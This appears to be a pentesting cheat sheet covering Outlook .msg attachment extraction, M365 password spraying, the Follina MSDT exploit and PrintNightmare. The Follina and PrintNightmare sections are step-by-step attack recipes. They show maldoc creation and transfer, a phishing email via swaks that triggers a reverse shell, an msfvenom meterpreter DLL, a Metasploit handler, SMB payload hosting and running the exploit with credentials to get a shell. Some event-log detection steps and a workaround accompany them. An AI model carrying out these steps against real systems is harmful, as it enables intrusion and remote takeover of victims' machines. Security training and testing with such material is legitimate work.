Microsoft Outlook Message (.msg) Pentesting

The .msg file is used to represent individual email messages, appointments, contacts, tasks, and so on in the file system.

• Decrypt & Open in Linux

sudo apt-get install libemail-outlook-message-perl libemail-sender-perl
msgcovert example.msg
open example.eml

Extract Attached Files

If the message is attached some file e.g. .zip, we can extract the file.

1. In CyberChef, paste the text contains Base64 encoded.

For example,

Content-ID: 
Content-Type: application/octet-stream; name=example.zip
Content-Disposition: attachment; filename=example.zip
Content-Transfer-Encoding: base64

UEsDBBQAAAAIAJBsAVWzNSwXM3oTAAAQ8QANAAAAc2VjdXJpdHkuZXZ0eOxdCXxVxdU/b8nLRhZk
R5aAoqINJISwChISAlSQCEHFUjCQxABJwCTsLnHBtSpabW2t1rpVu1g/97pVa22prRqXKrW0ta1t
...
6Vf33X5WvnNm5rx7373vvnffct97I==

1. Attach “Base64” and “Extract Files” operations.

After baking, we should get the attached file and download it.

Microsoft Word Pentesting

M365 (Microsoft Office 365) Pentesting

• Enumeration
• Password Spraying

We may spray user passwords with open-source tools as below.

• MFASweap
• o365spray

Follina MSDT (CVE-2022-30190)

Microsoft Support Diagnostic Tool (MSDT) is vulnerable with Follina.

1. Download the Payload in Local Machine

   Clone the payload from msdt-follina.

2. Create the Maldoc in Local Machine

# -i: interface name
python3 follina.py -i eth0

Then a new maldoc named “follina.doc” will be created in the current directory.
Now you’ve started the web server.

1. Open Another Web Server in Local Machine

Open another terminal and move to the msdt-follina directory, then start web server to transfer the maldoc to target machine.

python3 -m http.server 3456

1. Transfer the Maldoc to Target Machine

In target Windows machine, open powershell and execute the following command.

cd ~/Desktop
curl http://<local-ip>:3456/follina.doc -o follina.docx

1. Open the Maldoc

In target machine, open the maldoc you transfered.

.\follina.docx

1. Check the Process Explorer of Sysinternals in Target Machine

Find interesting processes in the Process Explorer.

1. Check the Event Viewer in Target Machine to Detect Suspicious Processes

2. Go to "View" -> "Use Quick Filter"

3. A search bar should appear on top of the logs. Choose “Find Event ID” on the right of the search bar, and enter “4688”(it means that “a new process has been created”) in a search bar.
4. Open the Find (Ctrl+F) and enter “winword”. Then check the contents of results.

5. Go to Options → Advanced Options

6. Reverse Shell via SMTP

   If the target uses SMTP, you may be able to reverse shell using it.
   Start the exploit to wait for reverse connections.

    sudo python3 follina.py -i tun0 -p 80 -r 4444

Send e-mail to the target machine via SMTP using [swaks](https://github.com/jetmore/swaks).

    swaks --to victim@vulnerable.com --from test@test --server mail.vulnerable.com --body "http://<local-ip>/"

Windows Print Spooler Service

A service that is running on each computer that participates in the Print Services system. It uses any port between 49152 and 65535. It may be vulnerable to the PrintNightmare (CVE-2021-1675 / CVE-2021-34527).

- [CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527)
- [printnightmarehpzqlp8](https://tryhackme.com/room/printnightmarehpzqlp8)

Investigation

# Check if the Print Spooler service is running
Get-Service -Name Spooler

Detection Services

1. Open Services.
2. We can find the Print Spooler on the Right Pane.

3. Double-click on it and see the details.

4. Malicious DLL Location

C:\Windows\System32\spool\drivers\x64\3\

Event Viewer

Open Event Viewer, and find event logs in the following directory in the left pane.
If you want to filter by Event ID, use "Filter Current Log" in the right pane.

• Application and Services Logs/Microsoft/Windows/PrintService/Admin (Event ID: 808)
• Application and Services Logs/Microsoft/Windows/PrintService/Operational (Event ID: 316, 811)
• Application and Services Logs/Microsoft/Windows/SMBClient/Security (Event ID: 31017)
• Application and Services Logs/Microsoft/Windows/Sysmon/Operational (Event ID: 3, 11, 23, 26)

• Windows Logs/System (Event ID: 7031)

• Packet Analysis (Wireshark)

Open .pcap file with Wireshark.

Filter packets with "smb" or "smb2".

PrintNightmare

This is security vulnerability to remote code execution in print spooler service.
It requires authentication (username/password).

1. Clone the Repository

git clone https://github.com/cube0x0/CVE-2021-1675

1. Create a Malicious DLL using Msfvenom

mkdir share
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<local-ip> LPORT=<local-port> -f dll -o ./share/malicious.dll

1. Start Metasploit and Reverse TCP

msfconsole

msf > use exploit/multi/handler
msf > set payload windows/x64/meterpreter/reverse_tcp
msf > set lhost <local-ip>
msf > set lport <local-port>

msf > run -j

# Started reverse tcp

msf > jobs

1. Host the Malicious DLL

impacket-smbserver share ./share/  -smb2support

1. Examine the Target Fits the Criteria to Exploit It

impacket-rpcdump @<target-ip> | egrep 'MS-RPRN|MS-PAR'
# Protocol: [MS-RPRN]: Print System Remote Protocol 
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol

1. Run the Exploit

cd CVE-2021-1675
python3 CVE-2021-1675.py Domain.Controller.local/<username>:<password>@<remote-ip> '\\<local-ip>\share\malicious.dll'

Now we should get a target shell in msfconsole.

1. Interact with Target System

Enter the target system via msfconsole.

msf> sessions
msf> sessions -i <session-id>
meterpreter> shell

C:\Windows\system32> whoami

Workarounds

# Disable the Print Spooler service
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled